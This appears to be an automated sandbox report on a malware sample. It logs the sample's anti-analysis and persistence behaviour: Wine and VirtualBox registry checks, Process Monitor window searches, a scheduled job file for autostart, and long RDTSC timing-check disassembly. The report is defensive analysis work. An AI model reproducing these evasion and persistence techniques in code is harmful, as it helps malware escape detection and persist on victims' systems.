Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Creates job files (autostart)
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe File created: C:\Windows\Tasks\explorti.job Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA155F0 LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_6CA155F0
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 45EFDD second address: 45EFE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 45EFE1 second address: 45E7A4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007FF698BF10CFh 0x0000000c pop edi 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 sub dword ptr [ebp+122D27ABh], edi 0x00000017 push dword ptr [ebp+122D0479h] 0x0000001d jmp 00007FF698BF10CDh 0x00000022 call dword ptr [ebp+122D2FA6h] 0x00000028 pushad 0x00000029 stc 0x0000002a xor eax, eax 0x0000002c jo 00007FF698BF10CCh 0x00000032 mov dword ptr [ebp+122D3303h], edx 0x00000038 jnl 00007FF698BF10C7h 0x0000003e mov edx, dword ptr [esp+28h] 0x00000042 stc 0x00000043 mov dword ptr [ebp+122D2807h], eax 0x00000049 jmp 00007FF698BF10D8h 0x0000004e mov esi, 0000003Ch 0x00000053 stc 0x00000054 clc 0x00000055 add esi, dword ptr [esp+24h] 0x00000059 sub dword ptr [ebp+122D3303h], esi 0x0000005f lodsw 0x00000061 jmp 00007FF698BF10CEh 0x00000066 add eax, dword ptr [esp+24h] 0x0000006a cld 0x0000006b jmp 00007FF698BF10CCh 0x00000070 mov ebx, dword ptr [esp+24h] 0x00000074 jmp 00007FF698BF10D5h 0x00000079 nop 0x0000007a push edi 0x0000007b pushad 0x0000007c push eax 0x0000007d push edx 0x0000007e rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 45E7A4 second address: 45E7AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 5E0EF1 second address: 5E0F0B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF698BF10D4h 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 5E1085 second address: 5E109D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF698E1E1B4h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 5E11E1 second address: 5E11ED instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF698BF10CEh 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 5E1353 second address: 5E136C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698E1E1B5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 5E1618 second address: 5E165A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push esi 0x00000006 jmp 00007FF698BF10D2h 0x0000000b jmp 00007FF698BF10D5h 0x00000010 pop esi 0x00000011 jmp 00007FF698BF10CAh 0x00000016 popad 0x00000017 push edx 0x00000018 jl 00007FF698BF10D2h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 5E3C15 second address: 5E3C5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 jng 00007FF698E1E1B2h 0x0000000d jc 00007FF698E1E1ACh 0x00000013 js 00007FF698E1E1A6h 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d jmp 00007FF698E1E1AEh 0x00000022 mov eax, dword ptr [eax] 0x00000024 jne 00007FF698E1E1B1h 0x0000002a mov dword ptr [esp+04h], eax 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 pushad 0x00000032 popad 0x00000033 pushad 0x00000034 popad 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 5E3C5F second address: 45E7A4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jg 00007FF698BF10C6h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d jmp 00007FF698BF10CEh 0x00000012 push dword ptr [ebp+122D0479h] 0x00000018 jnc 00007FF698BF10CCh 0x0000001e call dword ptr [ebp+122D2FA6h] 0x00000024 pushad 0x00000025 stc 0x00000026 xor eax, eax 0x00000028 jo 00007FF698BF10CCh 0x0000002e mov dword ptr [ebp+122D3303h], edx 0x00000034 jnl 00007FF698BF10C7h 0x0000003a mov edx, dword ptr [esp+28h] 0x0000003e stc 0x0000003f mov dword ptr [ebp+122D2807h], eax 0x00000045 jmp 00007FF698BF10D8h 0x0000004a mov esi, 0000003Ch 0x0000004f stc 0x00000050 clc 0x00000051 add esi, dword ptr [esp+24h] 0x00000055 sub dword ptr [ebp+122D3303h], esi 0x0000005b lodsw 0x0000005d jmp 00007FF698BF10CEh 0x00000062 add eax, dword ptr [esp+24h] 0x00000066 cld 0x00000067 jmp 00007FF698BF10CCh 0x0000006c mov ebx, dword ptr [esp+24h] 0x00000070 jmp 00007FF698BF10D5h 0x00000075 nop 0x00000076 push edi 0x00000077 pushad 0x00000078 push eax 0x00000079 push edx 0x0000007a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 5E3CB6 second address: 5E3CFE instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF698E1E1A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push esi 0x0000000d push edi 0x0000000e jmp 00007FF698E1E1B6h 0x00000013 pop edi 0x00000014 pop esi 0x00000015 nop 0x00000016 mov dword ptr [ebp+122D3303h], edx 0x0000001c push 00000000h 0x0000001e mov dword ptr [ebp+122D27ABh], edi 0x00000024 call 00007FF698E1E1A9h 0x00000029 pushad 0x0000002a pushad 0x0000002b pushad 0x0000002c popad 0x0000002d push ebx 0x0000002e pop ebx 0x0000002f popad 0x00000030 pushad 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 5E3CFE second address: 5E3D04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 5E3D04 second address: 5E3D23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF698E1E1B5h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 5E3E52 second address: 5E3EB0 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF698BF10C8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov cl, 89h 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007FF698BF10C8h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 0000001Ch 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 mov edx, eax 0x0000002b add si, 5400h 0x00000030 call 00007FF698BF10C9h 0x00000035 jp 00007FF698BF10CEh 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e push edi 0x0000003f jo 00007FF698BF10C6h 0x00000045 pop edi 0x00000046 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 5E40F5 second address: 5E40FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 5F5FBC second address: 5F5FC1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 5CD5AD second address: 5CD5B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 603716 second address: 60371C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 60371C second address: 603749 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF698E1E1A6h 0x00000008 jmp 00007FF698E1E1AFh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edi 0x00000013 pop edi 0x00000014 pop eax 0x00000015 jns 00007FF698E1E1AAh 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 603749 second address: 60375C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF698BF10CFh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 603E17 second address: 603E1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 6041F1 second address: 60423A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FF698BF10CBh 0x0000000d jmp 00007FF698BF10D9h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FF698BF10D8h 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 60423A second address: 60424F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698E1E1AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 60424F second address: 60426D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF698BF10D8h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 60426D second address: 60427D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 60427D second address: 60428D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698BF10CCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 60428D second address: 604293 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 604293 second address: 604297 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 604297 second address: 60429D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 60429D second address: 6042AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007FF698BF10C6h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 60442E second address: 604433 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 5FA3B4 second address: 5FA3B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 5FA3B8 second address: 5FA3BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 5D9244 second address: 5D9252 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnc 00007FF698BF10C6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 5D9252 second address: 5D925A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 60459D second address: 6045A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 6045A1 second address: 6045A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 60503A second address: 605050 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698BF10D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 605050 second address: 605056 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 605351 second address: 60538A instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF698BF10D7h 0x00000008 jmp 00007FF698BF10D9h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 60538A second address: 6053A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF698E1E1AAh 0x00000009 push edi 0x0000000a pop edi 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d popad 0x0000000e push eax 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 6053A3 second address: 6053A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 6053A8 second address: 6053C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF698E1E1B8h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 5C6CC1 second address: 5C6CC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 5D0C24 second address: 5D0C28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 5D0C28 second address: 5D0C3D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jnc 00007FF698BF10C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 push eax 0x00000011 pop eax 0x00000012 push edi 0x00000013 pop edi 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 5D0C3D second address: 5D0C4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FF698E1E1ADh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 60FA75 second address: 60FA79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 60FA79 second address: 60FA81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 60FA81 second address: 60FA9D instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF698BF10D2h 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007FF698BF10C6h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 60FA9D second address: 60FAB4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF698E1E1ACh 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 614026 second address: 614032 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007FF698BF10C6h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 614032 second address: 614036 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 6141BF second address: 6141CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FF698BF10C6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 6141CA second address: 6141DD instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF698E1E1A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 6141DD second address: 6141EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF698BF10CAh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 614741 second address: 614785 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698E1E1ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FF698E1E1B0h 0x0000000e jne 00007FF698E1E1C1h 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 614785 second address: 61478F instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF698BF10C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 614F46 second address: 614F4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 61500C second address: 61502C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF698BF10D3h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 61502C second address: 615070 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698E1E1B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FF698E1E1B3h 0x0000000e popad 0x0000000f mov eax, dword ptr [eax] 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FF698E1E1B8h 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 615070 second address: 6150C2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c js 00007FF698BF10DAh 0x00000012 push eax 0x00000013 jmp 00007FF698BF10D2h 0x00000018 pop eax 0x00000019 pop eax 0x0000001a jmp 00007FF698BF10D4h 0x0000001f call 00007FF698BF10C9h 0x00000024 push eax 0x00000025 push edx 0x00000026 jp 00007FF698BF10CCh 0x0000002c jc 00007FF698BF10C6h 0x00000032 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 6150C2 second address: 6150FA instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF698E1E1A8h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e jmp 00007FF698E1E1B1h 0x00000013 pop eax 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 jp 00007FF698E1E1AEh 0x0000001e jo 00007FF698E1E1A8h 0x00000024 pushad 0x00000025 popad 0x00000026 mov eax, dword ptr [eax] 0x00000028 push ebx 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 6150FA second address: 61510B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop ebx 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe RDTSC instruction interceptor: First address: 61510B second address: 61510F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
